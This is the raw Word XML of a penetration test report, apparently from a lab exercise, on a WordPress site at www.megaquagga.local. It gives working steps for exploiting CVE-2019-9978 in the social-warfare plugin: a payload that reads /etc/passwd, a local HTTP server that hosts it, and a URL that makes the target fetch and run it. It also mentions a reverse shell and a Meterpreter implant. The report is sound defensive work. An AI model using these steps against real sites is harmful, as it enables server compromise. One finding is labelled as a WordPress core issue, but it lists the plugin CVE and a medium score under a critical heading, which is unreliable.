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y47125ysu55"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PENETRATION TEST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(09/20/2025)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rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Prepared by </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Isidro Ibarra</w:t>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ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">During our testing, we have found an exploit within one of the plugins from Megaquagga Publishing’s website; www.megaquagga.local. This exploit can be done by injecting code into the server. This will give attackers access to the server and the ability to execute code. Furthermore, this exploit is public knowledge and easy to execute. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It is recommended for MQP to update their plugins and server to the recent version. Furthermore, it is also recommended to enable HTTPs for a secure connection between client and server. This ensure that the website becomes secure and encrypted  </w:t>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zjgb7rhn76"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Scope</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zhq65tf4qcir" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCOPE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000014">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The scope of this assessment defines the boundaries and limitations of the penetration test to ensure clarity and compliance. This section outlines the specific target systems evaluated, their associated parameters, and the exclusions and restrictions applied during the engagement.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t xml:space="preserve">The scope of this testing consists of the target website (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">www.megaquagga.local</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and only other properly-defined associated subdomains, subnets, or IP addresses tied to the website. Assets that can be used include only the public-facing website and the back-end servers. Anything outside of the scope is not permitted. The test will be done without the use of Excessive brute-force attacks, Denial-of-Service (DoS) or Distributed DoS (DDoS) testing, unless explicitly approved, and Data destruction or alteration.</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lhcwgb4pxmp" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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Methodology</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000018">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rqzatdbfn5ms" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">METHODOLOGY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This section describes the systematic approach followed during the penetration testing process. Each step is critical to ensure thorough evaluation of the target systems while adhering to ethical and procedural standards. The methodology is divided into several phases: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bqtbkq81ztex" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pre-Engagement and Planning: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">MegaQuagga Publishing gave us a detailed scope for testing their website (</w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">www.megaquagga.local</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) for any vulnerabilities, the risk and impact it could have, and the mitigation that can be taken.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gs22z1jkq7a" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Information Gathering (Reconnaissance): </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Visited the target website (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://www.megaquagga.local</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and concluded that it did not have HTTPS enabled. After getting permission to allow ICMP packets to go through the website, we are able to ping a connection from our device to the target and get an ip address (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="005cc5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.100.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000020">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9r5594o5k2m9" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Scanning: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000021">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Metasploit, we are able to scan the target website with command db_nmap to find what webserver it is running on (Apache </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">httpd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.4.38 (Debian)). Then, we used a detailed scan with command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> --url to find what versions of the website and plugins they are currently using.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lot9l5mefiec" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After digging through the WPScan results, we found a plugin (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">social-warfare</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) to be out-dated and have a vulnerability that can be exploited (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2019-9978</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). We followed the instructions of the exploit to test if it worked by showing the contents of a file within the website (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). Then we launched a reverse shell payload to make a connection with the website server.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35yxr2t1d2hl" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Post-Exploitation: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After making a session within the target system, we upgraded the payload into an implant using Metasploit. By doing so, we are able to profile the target using a command (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sysinfo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) and find the IP address, OS version, Architecture and Meterpreter of the machine the server is running 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iihuixrmglrl" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reporting: </w:t>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t xml:space="preserve">Documented all findings and methods within this report.</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z13whlvcdy"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Findings</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iohbkngq4291" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FINDINGS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This section presents the vulnerabilities identified during the penetration test, along with their potential impact and evidence collected. The findings are categorized by severity to assist in prioritizing remediation efforts.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acpce9te8o5o" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CRITICAL VULNERABILITIES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000032">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This section describes critical vulnerabilities discovered during this assessment.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Outdated WordPress Core Version</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CVE</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(CVE-2019-9978)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000038">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:alias w:val="Severity"/>
                <w:id w:val="-1735414578"/>
                <w:dropDownList w:lastValue="Medium">
                  <w:listItem w:displayText="Low" w:value="Low"/>
                  <w:listItem w:displayText="Medium" w:value="Medium"/>
                  <w:listItem w:displayText="High" w:value="High"/>
                </w:dropDownList>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:color w:val="753800"/>
                    <w:shd w:fill="ffc8aa" w:val="clear"/>
                  </w:rPr>
                  <w:t xml:space="preserve">Medium</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> (CVSS SCORE: 6.1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Top 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:sdt>
              <w:sdtPr>
                <w:alias w:val="OWASP Top 10"/>
                <w:id w:val="-1483312902"/>
                <w:dropDownList w:lastValue="A03 (Injection)">
                  <w:listItem w:displayText="CHOOSE APPLICABLE ITEM FROM DROPDOWN" w:value="CHOOSE APPLICABLE ITEM FROM DROPDOWN"/>
                  <w:listItem w:displayText="A01 (Broken Access Control)" w:value="A01 (Broken Access Control)"/>
                  <w:listItem w:displayText="A02 (Cryptographic Failures)" w:value="A02 (Cryptographic Failures)"/>
                  <w:listItem w:displayText="A03 (Injection)" w:value="A03 (Injection)"/>
                  <w:listItem w:displayText="A04 (Insecure Design)" w:value="A04 (Insecure Design)"/>
                  <w:listItem w:displayText="A05 (Security Misconfiguration)" w:value="A05 (Security Misconfiguration)"/>
                  <w:listItem w:displayText="A06 (Vulnerable and outdated components)" w:value="A06 (Vulnerable and outdated components)"/>
                  <w:listItem w:displayText="A07 (Identification and authentication failures)" w:value="A07 (Identification and authentication failures)"/>
                  <w:listItem w:displayText="A08 (Software and data integrity failures)" w:value="A08 (Software and data integrity failures)"/>
                  <w:listItem w:displayText="A09 (Security logging and monitoring failures)" w:value="A09 (Security logging and monitoring failures)"/>
                  <w:listItem w:displayText="A10 (Server-Side Request Forgery [SSRF])" w:value="A10 (Server-Side Request Forgery [SSRF])"/>
                </w:dropDownList>
              </w:sdtPr>
              <w:sdtContent>
                <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                  <w:rPr>
                    <w:color w:val="000000"/>
                    <w:shd w:fill="e8eaed" w:val="clear"/>
                  </w:rPr>
                  <w:t xml:space="preserve">A03 (Injection)</w:t>
                </w:r>
              </w:sdtContent>
            </w:sdt>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Risk</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Known Exploited Vulnerability (KEV)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps to exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="450" w:hanging="270"/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Create a payload file and save in home directory (ex: </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">&lt;pre&gt;system('cat /etc/passwd')&lt;/pre&gt;</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="450" w:hanging="270"/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Run command in the terminal </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 -m http.server</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:left="450" w:hanging="270"/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Enter </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="23"/>
                <w:szCs w:val="23"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">http://www.megaquagga.local/wp-admin/admin-post.php?swp_debug=load_options&amp;swp_url=http://[IP address]:[Port]/payload.txt</w:t>
            </w:r>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line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence</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 social-warfare</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> | Location: http://www.megaquagga.local/wp-content/plugins/social-warfare/</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> | Last Updated: 2024-09-17T20:18:00.000Z</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> | [!] The version is out of date, the latest version is 4.5.4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> |</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
            <w:pPr>
